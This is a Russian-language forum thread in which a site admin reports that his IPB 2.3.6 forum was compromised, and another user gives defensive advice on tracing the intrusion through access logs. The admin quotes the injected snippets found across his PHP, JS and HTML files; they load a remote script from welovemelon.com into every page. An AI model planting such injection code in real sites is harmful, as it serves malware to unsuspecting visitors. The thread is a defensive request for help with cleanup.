Перейти к контенту
  • 0

Проблема безопасности


Kowex

Вопрос

Собственно в чем проблема.

Форум 2.3.6

Работал форум долго без проблем, никаких изменений на нем небыло уже больше 2х лет (установка модов или подобных изменений)

И тут система выдала ошибку мода wr_domain (мульти домен) который ставил WildRAID 

syntax error, unexpected T_VARIABLE in C:\\wwwroot\xxxxxxxx.ru\wr_domain\class_wr_domain.php on line 257

отключил этот мод в файле index.php, форум поднялся, но рухнула почти вся джава, не открывается быстрый ответ, не вставляются ники в быстрый ответ, в админке не работают кнопки у стилей и т.д. и пользователи стали жаловаться на вирусы, стал искать.

Нашел что в почти всех файлах php и файлах js присутствует сторонний код

в файлах php

<?php
#39057f#
if(empty($aaiv)) {

$aaiv = "<script src=\"http://welovemelon.com/mongasweet/srAW8j9t.php?id=4554795\" type=\"text/javascript\"></script>";

echo $aaiv;

}


#/39057f#
?>

В файлах js

/*187cc4*/
document.write('<script src="http://welovemelon.com/mongasweet/srAW8j9t.php?id=4554786" type="text/javascript"></script>');
/*/187cc4*/

в файлах html

<!--f3f11d--><script src="http://welovemelon.com/mongasweet/srAW8j9t.php?id=4554582" type="text/javascript"></script><!--/f3f11d-->

Всё что нашел удалил, но ситуация не изменилась.

Писал WildRAID но он не отвечает :(

 

В чем может быть дело? И как это можно решить?

 

Ещё лучше если кто то поможет решить данную проблему.

Нужно:

1. Восстановить полностью работу форума

2. Закрыть дырки через которые это залезло.

Естественно не бесплатно.

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

  • 0

Дырки на сервере скорее всего, чаще всего шелл, уязвимость залития также возможно связана с ПО сервера.

Необходимо сделать ацесс логи к абсолютно ко всему, после чего удалить коды, потом в них можно увидеть к какому файлу обращаются, чтобы эти коды выставить.

Потом удалить этот файл и следить, через какой запрос он появится снова. Так можно уточнить уязвимость.

Ну естественно это если машина полностью принадлежит, а не несколько сайтов на одной машине. В таком случае менять хостера, у него вирус.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Сервер свой собственный, да, на нем несколько сайтов.


 

 

Необходимо сделать ацесс логи к абсолютно ко всему, после чего удалить коды, потом в них можно увидеть к какому файлу обращаются, чтобы эти коды выставить.

А вот кто это может сделать? 

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.